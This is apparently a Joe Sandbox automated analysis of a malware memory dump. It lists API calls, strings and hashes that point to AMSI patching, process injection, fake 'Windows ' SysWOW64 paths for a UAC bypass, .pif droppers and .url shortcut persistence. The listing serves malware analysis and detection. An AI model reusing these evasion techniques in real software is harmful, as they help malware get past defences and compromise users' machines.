DlpGetWebSiteAccess, xrefs: 027AA691
EnumProcessModules, xrefs: 027AAB99
NtMapViewOfSection, xrefs: 027AB128
CreateProcessAsUserW, xrefs: 027AABD5, 027AABF3
OpenProcess, xrefs: 027AAD1D
endpointdlp, xrefs: 027AA60F, 027AA642, 027AA675, 027AA6A8
NtOpenObjectAuditAlarm, xrefs: 027A93F6
EtwEventWriteEx, xrefs: 027AB2C0
NtWriteVirtualMemory, xrefs: 027AB25A
VirtualAllocEx, xrefs: 027AACB7
spp, xrefs: 027AA2A4, 027AA2D7, 027AAF74
ScanString, xrefs: 027A83FC, 027A8668, 027A910F, 027A9501, 027A98EA, 027A9CA6, 027A9FA4, 027AA35F, 027AA746, 027AA93D, 027AAEE7
I_QueryTagInformation, xrefs: 027A940A
CreateProcessAsUserA, xrefs: 027AABC6
SLGatherMigrationBlob, xrefs: 027AAFC3
ScanBuffer, xrefs: 027A86F9, 027A89C6, 027A8B6C, 027A8CF9, 027A8E8D, 027A900C, 027A9283, 027A937B, 027A9797, 027A9A70, 027A9BE4, 027A9E1A, 027A9EAC, 027AA1E4, 027AA582, 027AAAB1, 027AB3B7
MiniDumpReadDumpStream, xrefs: 027A9432
NtSetSecurityObject, xrefs: 027A9446
MiniDumpWriteDump, xrefs: 027A941E
EnumServicesStatusA, xrefs: 027AAB5D
NtReadVirtualMemory, xrefs: 027AB15B
DlpNotifyPreDragDrop, xrefs: 027AA5F8
UacInitialize, xrefs: 027A92FF, 027A971B
CreateProcessWithLogonW, xrefs: 027AABE4
NtQueryDirectoryFile, xrefs: 027AAB3F
NtDeviceIoControlFile, xrefs: 027AAB30
CreateProcessA, xrefs: 027AABA8
NtOpenFile, xrefs: 027AB28D
LdrGetProcedureAddress, xrefs: 027AB227
WriteVirtualMemory, xrefs: 027AAD50
NtQuerySystemInformation, xrefs: 027AAB21

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 2481178504-1225450241
Opcode ID: b1d27fe8a0d37fa4c2744c57e89104034b38a3d969fcf828fc3fc269f370a1de
Instruction ID: 19c28f68d6b127bb8d143406104556e31e4fbbbe982c51ff15499fcf8764d7cd
Opcode Fuzzy Hash: b1d27fe8a0d37fa4c2744c57e89104034b38a3d969fcf828fc3fc269f370a1de
Instruction Fuzzy Hash: 3E432B39B5111E9BCF12FB64DCA89DA73B6FFD8310F5041E6A009EB210DA71AE918F51

Function 027A4134 Relevance: 38.7, APIs: 2, Strings: 22, Instructions: 2741
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0279889C: LoadLibraryA.KERNEL32(00000000,00000000,02798983), ref: 027988D0
Part of subcall function 0279889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02798983), ref: 027988E0
Part of subcall function 0279889C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027988F9
Part of subcall function 0279889C: FreeLibrary.KERNEL32(74AD0000,00000000,027DB388,Function_0000662C,00000004,027DB398,027DB388,000186A3,00000040,027DB39C,74AD0000,00000000,00000000,00000000,00000000,02798983), ref: 02798963

Part of subcall function 02787E5C: GetFileAttributesA.KERNEL32(00000000,?,027A0714,ScanString,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,ScanString,027DB37C,027AB9D4,UacScan,027DB37C,027AB9D4,UacInitialize), ref: 02787E67

Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,ScanBuffer,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,027ABD74), ref: 027A549F

Part of subcall function 0279DEF8: Rt.N(?,?,00000000,0279DF72), ref: 0279DF20
Part of subcall function 0279DEF8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0279DF72), ref: 0279DF36
Part of subcall function 0279DEF8: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0279DF72), ref: 0279DF55

Sleep.KERNEL32(000007D0,ScanBuffer,027DB37C,027AB9D4,UacScan,027DB37C,027AB9D4,OpenSession,027DB37C,027AB9D4,ScanBuffer,027DB37C,027AB9D4,UacScan,027DB37C,027AB9D4), ref: 027A458A

Part of subcall function 0279DF80: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0279E052), ref: 0279DFBF
Part of subcall function 0279DF80: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0279DFF9
Part of subcall function 0279DF80: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0279E026
Part of subcall function 0279DF80: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0279E02F

Part of subcall function 02798818: LoadLibraryW.KERNEL32(bcrypt,?,000005A0,00000000,027DB3A4,0279A43F,ScanString,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,Initialize,027DB3A4,0279A7F4,UacScan), ref: 0279882C
Part of subcall function 02798818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02798846
Part of subcall function 02798818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005A0,00000000,027DB3A4,0279A43F,ScanString,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,Initialize), ref: 02798882

Part of subcall function 02798784: LoadLibraryW.KERNEL32(amsi), ref: 0279878D
Part of subcall function 02798784: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027987EC

Strings

[InternetShortcut], xrefs: 027A6F18
FX.c, xrefs: 027A51E3
UacScan, xrefs: 027A428E, 027A4470, 027A459B, 027A471E, 027A48EF, 027A49CD, 027A4B5B, 027A5D57, 027A62C7, 027A648C, 027A67BA, 027A68C7, 027A6B25, 027A6C1D
NEO.c, xrefs: 027A4F32
@echo off@%.%e%%c% %h% %o%.oo.% %.%o%, xrefs: 027A438E
C:\Users\Public\, xrefs: 027A41B0, 027A5F50, 027A71C3
C:\\Users\\Public\\Libraries\\, xrefs: 027A6337
IconIndex=, xrefs: 027A6F7D
.url, xrefs: 027A5F5B
ScanString, xrefs: 027A4212, 027A4D3D, 027A4FE9, 027A5780, 027A591A, 027A5C5F, 027A6023, 027A66C2, 027A6EA8, 027A701F, 027A70D7
C:\\Windows \\SysWOW64\\svchost.pif, xrefs: 027A4708
HotKey=, xrefs: 027A70B1
URL=file:", xrefs: 027A6F27
OpenSession, xrefs: 027A43EF, 027A4617, 027A479A, 027A4BD7, 027A4E35, 027A50E1, 027A5231, 027A5397, 027A552C, 027A57FC, 027A5996, 027A5B36, 027A5CDB, 027A5E4F, 027A609F, 027A6153, 027A6410, 027A6508, 027A69BF, 027A6C99, 027A6E0D, 027A6FA3, 027A7153
ScanBuffer, xrefs: 027A430A, 027A4515, 027A4693, 027A4816, 027A4892, 027A4A49, 027A4C53, 027A4EB1, 027A515D, 027A52AD, 027A5413, 027A55A8, 027A5878, 027A5BB2, 027A5ECB, 027A624B, 027A6584, 027A6836, 027A6A3B, 027A6BA1, 027A6D15, 027A6D91
C:\Users\Public\alpha.pif, xrefs: 027A561E
lld.SLITUTEN, xrefs: 027A4B18
C:\Users\Public\xkn.pif, xrefs: 027A5639
C:\\Windows \\SysWOW64\\, xrefs: 027A4B2E
UacInitialize, xrefs: 027A4DB9, 027A5065, 027A54B0, 027A5704, 027A5ABA, 027A5FA7
Initialize, xrefs: 027A5A3E, 027A5DD3, 027A61CF, 027A6394, 027A6600, 027A673E, 027A6943
UacUninitialize, xrefs: 027A4140, 027A4951

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Library$FilePath$FreeLoad$AddressNameName_ProcSleep$AttributesCloseCreateDeleteHandleModuleWrite
String ID: .url$@echo off@%.%e%%c% %h% %o%.oo.% %.%o%$C:\Users\Public\$C:\Users\Public\alpha.pif$C:\Users\Public\xkn.pif$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.pif$FX.c$HotKey=$IconIndex=$Initialize$NEO.c$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
API String ID: 3260000616-127592166
Opcode ID: c7dbce8d3d24f20b272d8a1b4d430741558f43dfc442077a3588279fecdfdcbb
Instruction ID: 6ef6f1f7588da8397b1ffe3bc0a8767f263076a3e18814f9cd4205d92d5fbdba
Opcode Fuzzy Hash: c7dbce8d3d24f20b272d8a1b4d430741558f43dfc442077a3588279fecdfdcbb
Instruction Fuzzy Hash: 00435E35B9115E8BDF22FB64DCA8F9A73B6BF95304F5041E29009AB210DB71AE91CF41

Function 0279E96C Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0279889C: LoadLibraryA.KERNEL32(00000000,00000000,02798983), ref: 027988D0
Part of subcall function 0279889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02798983), ref: 027988E0
Part of subcall function 0279889C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027988F9
Part of subcall function 0279889C: FreeLibrary.KERNEL32(74AD0000,00000000,027DB388,Function_0000662C,00000004,027DB398,027DB388,000186A3,00000040,027DB39C,74AD0000,00000000,00000000,00000000,00000000,02798983), ref: 02798963

Part of subcall function 02798654: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027986E0

Part of subcall function 02798818: LoadLibraryW.KERNEL32(bcrypt,?,000005A0,00000000,027DB3A4,0279A43F,ScanString,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,Initialize,027DB3A4,0279A7F4,UacScan), ref: 0279882C
Part of subcall function 02798818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02798846
Part of subcall function 02798818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005A0,00000000,027DB3A4,0279A43F,ScanString,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,Initialize), ref: 02798882

WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,027DB37C,0279F240,OpenSession,027DB37C,0279F240,UacScan,027DB37C,0279F240,ScanBuffer,027DB37C,0279F240,OpenSession,027DB37C), ref: 0279F062
CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,027DB37C,0279F240,OpenSession,027DB37C,0279F240,UacScan,027DB37C,0279F240,ScanBuffer,027DB37C,0279F240,OpenSession), ref: 0279F06A
CloseHandle.KERNEL32(0000089C,00000000,00000000,000000FF,ScanString,027DB37C,0279F240,OpenSession,027DB37C,0279F240,UacScan,027DB37C,0279F240,ScanBuffer,027DB37C,0279F240), ref: 0279F073

Strings

OpenSession, xrefs: 0279EA05, 0279EBAA, 0279ED5A, 0279EE8B, 0279EF82, 0279F0CE
NtOpenProcess, xrefs: 0279F1C5
NtSetSecurityObject, xrefs: 0279F1B4
AmsiOpenSession, xrefs: 0279EB08
ScanBuffer, xrefs: 0279EEDA, 0279F11D
ScanString, xrefs: 0279EA5E, 0279EC03, 0279EDCB, 0279EFF3
"C:\Users\Public\NsltarpnF.cmd" , xrefs: 0279EAE5, 0279ECA7
UacScan, xrefs: 0279E9AC, 0279EB51, 0279ECE9, 0279EF29, 0279F16C
ntdll, xrefs: 0279F1B9, 0279F1CA
Initialize, xrefs: 0279EE3C, 0279F07F
Amsi, xrefs: 0279EB19

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Library$Handle$AddressCloseFreeLoadProc$CreateModuleObjectProcessSingleUserWait
String ID: "C:\Users\Public\NsltarpnF.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
API String ID: 1374282660-2666271024
Opcode ID: b96b34d7aadc433189af4ec88b5f74365644d117407acf67d4ec7d32e4a18804
Instruction ID: 5ee74447b561d33f7cfc27c2596771880e59b8c3e34794743e0a99351c8d4c81
Opcode Fuzzy Hash: b96b34d7aadc433189af4ec88b5f74365644d117407acf67d4ec7d32e4a18804
Instruction Fuzzy Hash: AC222279B4021A9BDF12FB64E899FDE73B6EF85700F1041A1D004EB614EAB0EE458F56

Function 02781724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,02782000), ref: 027817D0
Sleep.KERNEL32(0000000A,00000000,?,02782000), ref: 027817E6

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 29792029b7be3d99d7243b07e5099be97f2f3366e8396ee80f99db6792f0801c
Instruction ID: ebe3e8642accb9d995233d2a75d7a6dc8e6d9fcab090bc0ee6b2c439c21407fb
Opcode Fuzzy Hash: 29792029b7be3d99d7243b07e5099be97f2f3366e8396ee80f99db6792f0801c
Instruction Fuzzy Hash: D3B14272A823528BCB15DF69D884356BBE1EB85330F48C6AED44DCB381C7309453CBA2

Function 02798784 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 0279878D

Part of subcall function 02798140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027981C8,?,?,00000000,00000000,?,027980E1,00000000,KernelBASE,00000000,00000000,02798108), ref: 0279818D
Part of subcall function 02798140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02798193
Part of subcall function 02798140: GetProcAddress.KERNEL32(?,?), ref: 027981A5

Part of subcall function 02797D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02797DEC

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027987EC

Strings

W, xrefs: 02798799
amsi, xrefs: 02798788
DllGetClassObject, xrefs: 027987B2

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: f8fff3f3055240c5f54c3a99daf5ea042c5d0e4eeb5da30fb64d75fba9e25773
Instruction ID: b80744451726ed352d067df07ade0e3431185a34f494024b540a816691640a3c
Opcode Fuzzy Hash: f8fff3f3055240c5f54c3a99daf5ea042c5d0e4eeb5da30fb64d75fba9e25773
Instruction Fuzzy Hash: 8EF068A054C38179D702E779DC49F4FBECD4F52224F048A5DB1E85A2D2D679D1048B77

Function 02781A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02781FE4), ref: 02781B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02781FE4), ref: 02781B31

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7d9086b0a777a646b8439e0acc2b28376f4cb721633a4e7456617d392842de38
Instruction ID: 1d070ce5d9340cad0122d7bf8653eed07baf8c509ad10ff6705086183fddd797
Opcode Fuzzy Hash: 7d9086b0a777a646b8439e0acc2b28376f4cb721633a4e7456617d392842de38
Instruction Fuzzy Hash: CF51C3716812418FD716EF6CD984756BFE0AF45324F9885AED44CCB282E770D847CBA2

Function 0279E7AA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0279E8EA

Strings

OpenSession, xrefs: 0279E88C
ScanBuffer, xrefs: 0279E833
Initialize, xrefs: 0279E7DA

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: e549a6510180e6edb52e70a86558468f4c2c4ccecf4ac1ccbef969691c399481
Instruction ID: 9f9d29568eb946fc388e38097bec71667251f12445db5871b19f879c2c4dce05
Opcode Fuzzy Hash: e549a6510180e6edb52e70a86558468f4c2c4ccecf4ac1ccbef969691c399481
Instruction Fuzzy Hash: 4B413F75B5020A9FDF52FBA4E859E9EB7BAEF88710F504472E041A7240EAB1AD018F51

Function 0279889C Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,02798983), ref: 027988D0
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02798983), ref: 027988E0
GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027988F9

Part of subcall function 02797D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02797DEC

FreeLibrary.KERNEL32(74AD0000,00000000,027DB388,Function_0000662C,00000004,027DB398,027DB388,000186A3,00000040,027DB39C,74AD0000,00000000,00000000,00000000,00000000,02798983), ref: 02798963

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
String ID:
API String ID: 1543721669-0
Opcode ID: c8e8c7c1ab1f5250e0d7f45140bce036751df87084968829387e46731c9af963
Instruction ID: 70d1532d1846dadca608bb0bdc8940f19a2ec03ea18422c631c49fcad6abb2ca
Opcode Fuzzy Hash: c8e8c7c1ab1f5250e0d7f45140bce036751df87084968829387e46731c9af963
Instruction Fuzzy Hash: A71193F4B80344BFEB01FBB8EC1AA1E7BBEEB45700F4214607104E7240EA74A9009B1A

Function 02798486 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 02798098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02798108,?,?,00000000,?,02797A7E,ntdll,00000000,00000000,02797AC3,?,?,00000000), ref: 027980D6
Part of subcall function 02798098: GetModuleHandleA.KERNELBASE(?), ref: 027980EA

Part of subcall function 02798140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027981C8,?,?,00000000,00000000,?,027980E1,00000000,KernelBASE,00000000,00000000,02798108), ref: 0279818D
Part of subcall function 02798140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02798193
Part of subcall function 02798140: GetProcAddress.KERNEL32(?,?), ref: 027981A5

WinExec.KERNEL32(?,?), ref: 027984F0

Strings

WinExec, xrefs: 027984A1
Kernel32, xrefs: 027984D3

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: d0fba39f9e2637fd6b1a6227ae657ddc1dcc696ca768674f9d417f263b1904b3
Instruction ID: 48d6d871815839c14745fd015faeb9e0fa5a2975688d8ff1614008963af3e457
Opcode Fuzzy Hash: d0fba39f9e2637fd6b1a6227ae657ddc1dcc696ca768674f9d417f263b1904b3
Instruction Fuzzy Hash: B901A4B1680304BFEB01FFA8EC15F5E77EEE74A700F928460B504D2640EA74ED109E26

Function 02798488 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02798098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02798108,?,?,00000000,?,02797A7E,ntdll,00000000,00000000,02797AC3,?,?,00000000), ref: 027980D6
Part of subcall function 02798098: GetModuleHandleA.KERNELBASE(?), ref: 027980EA

Part of subcall function 02798140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027981C8,?,?,00000000,00000000,?,027980E1,00000000,KernelBASE,00000000,00000000,02798108), ref: 0279818D
Part of subcall function 02798140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02798193
Part of subcall function 02798140: GetProcAddress.KERNEL32(?,?), ref: 027981A5

WinExec.KERNEL32(?,?), ref: 027984F0

Strings

WinExec, xrefs: 027984A1
Kernel32, xrefs: 027984D3

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: d193201ace1cc975a2dc191cced186fdf15ee84634593dc1976bbaa447b8080c
Instruction ID: cfcf82223486e1161006d5f44c40c72645f09695b7177c28ba47cc861744d2fc
Opcode Fuzzy Hash: d193201ace1cc975a2dc191cced186fdf15ee84634593dc1976bbaa447b8080c
Instruction Fuzzy Hash: 60F0A4B1680304BFEB01FFA8EC15F5E77EEE74A700F928460B504D2640EA74A9109E26

Function 02795C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

